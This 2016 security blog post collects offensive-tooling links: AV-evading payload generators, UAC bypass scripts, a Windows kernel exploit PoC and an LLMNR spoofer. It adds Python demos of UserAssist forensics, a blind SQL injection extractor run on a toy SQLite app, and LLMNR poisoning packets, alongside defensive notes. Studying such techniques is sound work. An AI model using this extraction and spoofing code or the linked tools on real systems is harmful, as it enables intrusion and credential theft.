Tuesday, September 13, 2016

Useful links:

Rot13 in Windows:
https://blog.didierstevens.com/2006/07/24/rot13-is-used-in-windows-you%E2%80%99re-joking/

UserAssist - registry keys that record (ROT13-encoded) what you ran on your PC. A useful utility for viewing them:
https://blog.didierstevens.com/programs/userassist/
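
Added example (my own code, not Didier's tool): a small Python parser for these entries. It ROT13-decodes the value names and unpacks the two record layouts commonly documented for UserAssist (16 bytes on XP/2003, 72 bytes on Windows 7 and later, with the FILETIME of the last run at offset 60). The sample name and bytes at the bottom are constructed, not captured from a real machine; on Windows, read_live_userassist() walks the real key.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# UserAssist records live under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count.
# Value names are ROT13-encoded program paths; value data is a small binary record
# whose layout depends on the Windows version (16 bytes on XP, 72 bytes on Windows 7+).

WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime; 0 means 'never run'."""
    if ft == 0:
        return None
    return WINDOWS_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime, in integer arithmetic so large values stay exact."""
    delta = dt - WINDOWS_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def decode_name(name: str) -> str:
    """ROT13-decode a UserAssist value name (ROT13 is its own inverse)."""
    return codecs.decode(name, "rot_13")


def parse_value(data: bytes) -> dict:
    """Parse one UserAssist value.

    XP/2003 (16 bytes): session id, run counter, FILETIME. The counter starts at 5,
    so the real run count is counter - 5.
    Windows 7+ (72 bytes): session id, run count, focus count, focus time (ms),
    ten floats, 4 unknown bytes, FILETIME at offset 60, 4 trailing bytes.
    """
    if len(data) == 16:
        _session, counter, ft = struct.unpack("<IIQ", data)
        return {"format": "xp", "run_count": max(counter - 5, 0),
                "last_run": filetime_to_datetime(ft)}
    if len(data) == 72:
        _session, run_count, focus_count, focus_ms = struct.unpack_from("<IIII", data, 0)
        (ft,) = struct.unpack_from("<Q", data, 60)
        return {"format": "win7", "run_count": run_count, "focus_count": focus_count,
                "focus_time_ms": focus_ms, "last_run": filetime_to_datetime(ft)}
    raise ValueError(f"unexpected UserAssist record length {len(data)}")


def read_live_userassist():
    """Walk the live registry (Windows only) and return [(decoded name, parsed record)]."""
    import winreg  # stdlib, but only importable on Windows
    base = r"Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist"
    results = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, base) as ua:
        for i in range(winreg.QueryInfoKey(ua)[0]):              # [0] = number of subkeys
            with winreg.OpenKey(ua, winreg.EnumKey(ua, i) + r"\Count") as count:
                for j in range(winreg.QueryInfoKey(count)[1]):  # [1] = number of values
                    name, data, _type = winreg.EnumValue(count, j)
                    try:
                        results.append((decode_name(name), parse_value(data)))
                    except ValueError:
                        pass  # skip records with an unknown layout
    return results


# Constructed sample data (not taken from a real system): Windows 7 and XP records
# for cmd.exe, last run on 2016-09-13 12:00 UTC.
SAMPLE_NAME = r"{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr"
SAMPLE_LAST_RUN = datetime(2016, 9, 13, 12, 0, 0, tzinfo=timezone.utc)
SAMPLE_WIN7 = (struct.pack("<IIII", 0, 3, 2, 1500)
               + struct.pack("<10f", *([0.0] * 10))
               + b"\x00" * 4
               + struct.pack("<Q", datetime_to_filetime(SAMPLE_LAST_RUN))
               + b"\x00" * 4)
SAMPLE_XP = struct.pack("<IIQ", 0, 8, datetime_to_filetime(SAMPLE_LAST_RUN))

if __name__ == "__main__":
    print(decode_name(SAMPLE_NAME))
    print(parse_value(SAMPLE_WIN7))
    print(parse_value(SAMPLE_XP))
```

Timestamps come out as UTC; convert to the machine's zone when you correlate them with other artifacts.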

Undetectable Windows payload generation (metasploit generates the shellcode, then Python code is generated that executes it, then that is AES-encrypted and packed into an MZ/PE executable):
https://github.com/nccgroup/Winpayloads
(description of the UAC bypass it uses (IFileOperation again) - https://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html)

Masquerade-PEB PowerShell script (used for UAC bypass):
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Masquerade-PEB.ps1
with an interesting idea (from its description):

Masquerade-PEB uses NtQueryInformationProcess to get a handle to powershell's
PEB. From there it replaces a number of UNICODE_STRING structs in memory to
give powershell the appearance of a different process. Specifically, the
function will overwrite powershell's "ImagePathName" & "CommandLine" in
_RTL_USER_PROCESS_PARAMETERS and the "FullDllName" & "BaseDllName" in the
_LDR_DATA_TABLE_ENTRY linked list.

This can be useful as it would fool any Windows work-flows which rely solely
on the Process Status API to check process identity. A practical example would
be the IFileOperation COM Object which can perform an elevated file copy if it
thinks powershell is really explorer.exe ;)!

(Note: this only fools lookups that read the PEB, e.g. PSAPI; the kernel keeps its own copy of the image path, which QueryFullProcessImageName returns, so comparing the two is one way to spot it.)

one more UAC bypass (same author):
https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC


Interesting case: how to run code in the context of InstallUtil.exe from the Windows directory. It can even be used as an autorun, for example:
http://www.blackhillsinfosec.com/?p=4881

How to run a console program with parameters when cmd.exe is disabled:
http://www.blackhillsinfosec.com/?p=5257

Some interesting tool (command-line ETW tracing):
https://github.com/goldshtn/etrace

CVE-2016-3308 - win32k heap corruption (kernel EoP), PoC:
https://github.com/55-AA/CVE-2016-3308

Blind SQL injection framework (BBQSQL):
http://www.darknet.org.uk/2016/09/bbqsql-blind-sql-injection-framework/
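
Added example (my own code, not BBQSQL's): the core of what such a framework automates, boolean-based blind extraction by binary search. The target is a constructed in-memory SQLite "app" whose only visible output is whether a user exists; the vulnerable lookup concatenates input, the safe one binds a parameter, and the same extractor is run against both so you can see the injection stop working.

```python
import sqlite3

# Constructed vulnerable app (not a real product): an in-memory SQLite database and a
# lookup that concatenates user input into SQL. The caller only learns True/False
# ("does that user exist?"), which is the boolean oracle a blind-SQLi framework drives.


def _seed(conn):
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!'), ('bob', 'hunter2')")


def make_vulnerable_app():
    conn = sqlite3.connect(":memory:")
    _seed(conn)

    def user_exists(username: str) -> bool:
        sql = f"SELECT 1 FROM users WHERE username = '{username}'"   # VULNERABLE: no binding
        return conn.execute(sql).fetchone() is not None
    return user_exists


def make_safe_app():
    """Same lookup with a bound parameter; the payload below is just a user that does not exist."""
    conn = sqlite3.connect(":memory:")
    _seed(conn)

    def user_exists(username: str) -> bool:
        return conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone() is not None
    return user_exists


def make_oracle(user_exists):
    """Turn the yes/no endpoint into an oracle for an arbitrary SQL condition.

    Payload:  admin' AND (<condition>) --    -> True iff the condition holds.
    oracle.calls["n"] counts requests, the metric a blind attack is judged by.
    """
    calls = {"n": 0}

    def oracle(condition: str) -> bool:
        calls["n"] += 1
        return user_exists(f"admin' AND ({condition}) -- ")
    oracle.calls = calls
    return oracle


def _search(oracle, expr: str, lo: int, hi: int) -> int:
    """Binary search for the integer value of SQL expression expr, known to lie in [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle, subquery: str, max_len: int = 64) -> str:
    """Extract the (ASCII) result of a scalar subquery one character at a time.

    Length first, then each character by binary search over 0..127 (about 7 requests
    per character instead of up to 128). A NULL result compares false everywhere and
    therefore yields length 0, i.e. the empty string.
    """
    n = _search(oracle, f"length(({subquery}))", 0, max_len)
    return "".join(chr(_search(oracle, f"unicode(substr(({subquery}), {i}, 1))", 0, 127))
                   for i in range(1, n + 1))


if __name__ == "__main__":
    target = "SELECT password FROM users WHERE username = 'admin'"
    vuln = make_oracle(make_vulnerable_app())
    print(extract_string(vuln, target), "in", vuln.calls["n"], "requests")   # S3cr3t!
    safe = make_oracle(make_safe_app())
    print(repr(extract_string(safe, target)))                                # ''
```

Against a real web app the oracle is an HTTP request plus a response comparison (status, length, a keyword), and that comparison is where most of the framework's complexity lives; the search logic above stays the same.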

LLMNR/NBNS spoofer:
https://github.com/Kevin-Robertson/Inveigh
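
Added example (my own code, not Inveigh's): the LLMNR exchange itself in Python, so the spoofing trick is visible byte by byte. It builds a victim's query in the DNS wire format LLMNR uses (RFC 4795, multicast 224.0.0.252 on UDP 5355), shows an honest responder that answers only for names it owns next to a poisoning responder that answers everything, and parses the reply back. The hostnames and addresses in the demo are constructed; query_on_wire() sends a real query for lab use.

```python
import ipaddress
import random
import socket
import struct

# LLMNR (RFC 4795): a DNS-format query sent to multicast 224.0.0.252, UDP 5355.
# Anyone on the segment may reply unicast with the "right" address; a spoofer
# simply answers every query with its own IP. NBNS on UDP 137 works the same way.
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"


def decode_name(buf: bytes, off: int):
    """Read labels at buf[off:]; returns (name, offset just past the terminator)."""
    labels = []
    while True:
        ln = buf[off]
        off += 1
        if ln == 0:
            return ".".join(labels), off
        if ln & 0xC0:   # compression pointer; the packets built here never use one
            raise ValueError("compression pointers not supported")
        labels.append(buf[off:off + ln].decode("ascii"))
        off += ln


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """Victim side: ID, flags 0 (standard query), QDCOUNT 1, one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes) -> dict:
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack_from("!HHHHHH", pkt, 0)
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack_from("!HH", pkt, off)
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_response(query: dict, ip: str, ttl: int = 30) -> bytes:
    """Responder side: echo the ID and question, set QR, append one A record."""
    rdata = ipaddress.IPv4Address(ip).packed
    header = struct.pack("!HHHHHH", query["id"], 0x8000, 1, 1, 0, 0)
    question = encode_name(query["name"]) + struct.pack("!HH", query["qtype"], query["qclass"])
    answer = encode_name(query["name"]) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def honest_responder(pkt: bytes, my_names, my_ip: str):
    """A legitimate host answers only for names it actually owns (names are case-insensitive)."""
    q = parse_query(pkt)
    return build_response(q, my_ip) if q["name"].upper() in {n.upper() for n in my_names} else None


def poisoning_responder(pkt: bytes, attacker_ip: str) -> bytes:
    """What an LLMNR spoofer does: answer *every* query (typos included) with its own address."""
    return build_response(parse_query(pkt), attacker_ip)


def parse_response(pkt: bytes) -> dict:
    txid, flags, qdcount, ancount, _ns, _ar = struct.unpack_from("!HHHHHH", pkt, 0)
    if not flags & 0x8000:
        raise ValueError("not a response")
    off = 12
    for _ in range(qdcount):              # skip the echoed question(s)
        _name, off = decode_name(pkt, off)
        off += 4
    answers = []
    for _ in range(ancount):
        name, off = decode_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", pkt, off)
        off += 10
        rdata, off = pkt[off:off + rdlen], off + rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((name, str(ipaddress.IPv4Address(rdata)), ttl))
    return {"id": txid, "answers": answers}


def query_on_wire(name: str, timeout: float = 2.0):
    """Send a real query (lab use only; not exercised by the offline demo below)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    s.sendto(build_query(random.randrange(1, 0x10000), name), (LLMNR_GROUP, LLMNR_PORT))
    pkt, src = s.recvfrom(1500)   # a spoofer's reply arrives from an address you did not expect
    return src, parse_response(pkt)


if __name__ == "__main__":
    # Constructed exchange: the victim mistypes a file server name; only the spoofer answers.
    q = build_query(0x1234, "FILESRV01")
    print(honest_responder(q, ["FILESRV1"], "10.0.0.5"))          # None: not my name
    print(parse_response(poisoning_responder(q, "10.0.0.66")))    # attacker's address
```

The response carries no authentication at all, which is why the usual fix is to disable LLMNR/NBNS by policy rather than to try to validate replies.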